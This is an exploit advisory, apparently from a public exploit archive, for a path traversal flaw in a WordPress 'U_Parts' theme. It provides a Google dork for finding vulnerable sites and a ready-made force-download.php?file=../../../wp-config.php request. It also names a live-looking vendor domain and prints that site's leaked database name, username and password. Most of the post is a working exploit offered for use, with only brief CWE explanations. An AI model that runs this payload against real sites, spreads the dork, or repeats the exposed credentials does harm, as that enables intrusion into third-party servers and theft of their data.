WordPress 4.9.x U_Parts Themes DB Config File Download

1. ############################################################################################
2.  
3. # Exploit Title : WordPress 4.9.x U_Parts Themes Database Configuration File Download
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 20/03/2019
7. # Vendor Homepage : u-parts.com
8. # Software Information Link : u-parts.com/export-business/company-information/
9. # Software Version : 4.9.x
10. # Tested On : Windows and Linux
11. # Category : WebApps
12. # Exploit Risk : Medium
13. # Google Dorks : inurl:/wp-content/themes/u_parts/
14. # Vulnerability Type :
15. CWE-16 [ Configuration ]
16. CWE-200 [ Information Exposure ]
17. CWE-23 [ Relative Path Traversal ]
18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
21.  
22. ############################################################################################
23.  
24. # Impact :
25. ***********
26. * WordPress 4.9.x U_Parts Themes is prone to a vulnerability that lets attackers download database config file because
27.  
28. the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files
29.  
30. within the context of the web server process and obtain potentially sensitive informations.
31.  
32. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
33.  
34. to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct
35.  
36. a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve
37.  
38. to a location that is outside of that directory.
39.  
40. ############################################################################################
41.  
42. # Vulnerable File :
43. ****************
44. /force-download.php
45.  
46. # Vulnerable Parameter :
47. **********************
48. ?file=
49.  
50. # Database Configuration File Download Exploit :
51. ********************************************
52. /wp-content/themes/u_parts/force-download.php?file=../../../wp-config.php
53.  
54. Informations About MySQL Database Configuration File =>
55. ****************************************************
56. ** The name of the database for WordPress */
57. define('DB_NAME', '');
58.  
59. /** MySQL database username */
60. define('DB_USER', '');
61.  
62. /** MySQL database password */
63. define('DB_PASSWORD', '');
64.  
65. /** MySQL hostname */
66. define('DB_HOST', '');
67.  
68. ############################################################################################
69.  
70. # Example Vulnerable Sites :
71. *************************
72. [+] u-parts.com/wp-content/themes/u_parts/force-download.php?file=../../../wp-config.php
73.  
74. */
75. define('DB_NAME', 'u_parts');
76.  
77. /** MySQL
78. */
79. define('DB_USER', 'u_parts');
80.  
81. /** MySQL
82. */
83. define('DB_PASSWORD', 'YxG3J7kA');
84.  
85. /**
86. */
87. define('DB_HOST', 'localhost');
88.  
89. //define('DB_HOST', '127.0.0.1');
90.  
91. /**
92. */
93. define('DB_CHARSET', 'utf8');
94.  
95. /**
96. */
97. define('DB_COLLATE', '');
98.  
99. /**#@+
100. *
101.  
102. ############################################################################################
103.  
104. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
105.  
106. ############################################################################################